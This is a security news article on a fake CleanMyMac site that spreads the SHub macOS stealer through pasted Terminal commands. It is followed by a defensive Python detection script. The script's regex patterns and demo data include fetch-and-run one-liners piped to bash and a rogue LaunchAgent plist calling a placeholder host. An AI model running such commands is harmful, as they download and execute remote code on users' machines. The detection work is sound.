- Fake CleanMyMac Utility Spreads SHub Information Stealer
- Attack tricks users into pasting terminal commands
- Malware Steals Credentials, Cryptocurrencies, and Persists Through a Backdoor
A fake Mac utility program tricks users into installing information-stealing malware that exfiltrates passwords, sensitive files and even money, experts have warned.
Security researchers at Malwarebytes said the program is part of a larger, well-developed campaign that also includes a custom lookalike website, brand spoofing, a loader, and the well-worn ClickFix technique, in which the victim is talked into running the attacker's command by hand.
Researchers said the campaign spoofs CleanMyMac, a legitimate Mac optimization program built by MacPaw, with a nearly identical website at cleanmymacos.[DOT]org that is easy to mistake for the real thing. However, instead of simply downloading and running an installer, visitors are told to open Terminal and paste a command that fetches the payload from a third-party server.
Steal files and establish persistence
“Instead of exploiting a vulnerability, this tricks the user into running the malware themselves,” Malwarebytes explained. “Since the command is executed voluntarily, protections such as Gatekeeper, notarization controls, and XProtect offer little protection once the user pastes the command and hits Return.”
The malware installed this way is called SHub, and once running it prompts the victim for their macOS password. Because the whole installation process is unorthodox and looks like something a power user might do, victims may take the prompt as routine, the researchers explained.
In reality, the password gives SHub access to the macOS keychain, Wi-Fi credentials, app tokens and other private keys.
“With the password in hand, SHub begins a systematic scan of the machine,” Malwarebytes researchers said.
After harvesting passwords, cookies, autofill data, crypto wallet browser extensions, iCloud account data, Telegram session files and other valuables, it drops a second-stage backdoor that replaces some cryptocurrency wallet apps with malicious copies. This lets the malware keep its foothold and enables further cryptocurrency theft down the line.
Finally, the operators install a LaunchAgent disguised as a Google update service.
“In practice, this gives attackers the ability to execute commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concludes.
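The two behaviours the report describes, a pasted fetch-and-run one-liner and a LaunchAgent posing as a vendor updater, are both things a Mac admin can hunt for after the fact. The script below is an added example written for this article; it is not code from Malwarebytes, TechRadar or the SHub campaign, and the article gives none of the campaign's real labels, paths or commands, so every indicator here is a generic heuristic for the pattern rather than a signature. It goes a little beyond the article by matching several common ClickFix shapes (curl piped to a shell, base64-decode piped to a shell, osascript wrappers) rather than one command. The sample shell-history lines and the two LaunchAgent plists are constructed for the demo (the domain example.invalid is a placeholder), and the "legitimate Google directories" list is an assumption about where Google's real updater lives that you should adjust for your own fleet.

```python
"""Hunt for ClickFix-style shell one-liners and LaunchAgents posing as updaters.

Added example for this article; not the campaign's real indicators.
Heuristics only: a hit is a lead to inspect, not proof of infection.
"""
import plistlib
import re
from pathlib import Path

# --- 1. ClickFix: a pasted command that downloads and runs a remote payload ---

# Shapes we flag in shell history: download piped straight into an interpreter,
# an embedded blob decoded and executed, or an osascript/`sh -c` wrapper around curl.
CLICKFIX_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),          # curl ... | bash
    re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),    # ... | base64 -d | sh
    re.compile(r"\bosascript\b.*\b(do shell script|curl)\b"),
    re.compile(r"\b(bash|zsh|sh)\s+-c\s+[\"']\$\(curl"),                      # sh -c "$(curl ...)"
]


def find_clickfix_commands(history_lines):
    """Return (line_number, line) for every history entry matching a ClickFix shape."""
    hits = []
    for n, line in enumerate(history_lines, 1):
        if any(p.search(line) for p in CLICKFIX_PATTERNS):
            hits.append((n, line.strip()))
    return hits


# --- 2. Persistence: a LaunchAgent whose label claims to be a vendor updater ---

# Assumption: Google's own updater components live under these directories.
LEGIT_GOOGLE_DIRS = ("/Library/Google/", "/Library/Application Support/Google/")
# A real updater is a compiled binary; an agent that starts an interpreter is odd.
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "curl", "base64"}
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def inspect_launch_agent(plist_bytes):
    """Return a list of findings for one LaunchAgent plist; empty means nothing looked wrong."""
    p = plistlib.loads(plist_bytes)
    label = p.get("Label", "")
    args = p.get("ProgramArguments") or ([p["Program"]] if "Program" in p else [])
    program = args[0] if args else ""
    findings = []

    claims_google = "google" in label.lower() or "keystone" in label.lower()
    if claims_google and not any(d in program for d in LEGIT_GOOGLE_DIRS):
        findings.append(f"{label}: label claims Google but runs {program!r}")
    if Path(program).name in INTERPRETERS:
        findings.append(f"{label}: ProgramArguments start with an interpreter ({Path(program).name})")
    if any(part.startswith(".") for part in Path(program).parts[1:]):
        findings.append(f"{label}: program lives in a hidden path component")
    if program.startswith(SUSPICIOUS_DIRS):
        findings.append(f"{label}: program lives in a scratch directory")
    if any(pat.search(" ".join(args)) for pat in CLICKFIX_PATTERNS):
        findings.append(f"{label}: arguments contain a fetch-and-run one-liner")
    return findings


def scan_launch_agents(directory):
    """Run inspect_launch_agent over every .plist in a directory such as ~/Library/LaunchAgents."""
    report = {}
    for plist_path in sorted(Path(directory).expanduser().glob("*.plist")):
        try:
            findings = inspect_launch_agent(plist_path.read_bytes())
        except Exception as exc:  # a plist launchd cannot parse is itself worth a look
            findings = [f"could not parse: {exc}"]
        if findings:
            report[str(plist_path)] = findings
    return report


# Constructed sample data for the demo (not taken from a real host).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL http://example.invalid/setup.sh | bash",
    "brew install wget",
    "echo aGVsbG8= | base64 -d | sh",
    "cat notes.txt | grep bash",
]
ROGUE_AGENT = plistlib.dumps({  # label imitates an updater; body runs a shell fetch
    "Label": "com.google.update.agent",
    "ProgramArguments": ["/bin/bash", "-c", "curl -fsSL http://example.invalid/b | bash"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
LEGIT_AGENT = plistlib.dumps({  # shaped like a genuine Keystone agent (constructed)
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/"
                         "GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for n, line in find_clickfix_commands(SAMPLE_HISTORY):
        print(f"history line {n}: {line}")
    for name, blob in (("rogue sample", ROGUE_AGENT), ("legit sample", LEGIT_AGENT)):
        print(name, inspect_launch_agent(blob) or "clean")
    for path, findings in scan_launch_agents("~/Library/LaunchAgents").items():
        print(path, *findings, sep="\n  ")
```

Run it on a Mac and it prints the two sample hits, the three findings on the rogue plist, nothing for the legitimate-looking one, and then whatever it finds in the current user's LaunchAgents folder. The checks are deliberately loose so they catch the shape of the technique rather than this one campaign; expect a few benign hits (homebrew scripts, developer tooling) and treat each as something to look at, not as an alert on its own.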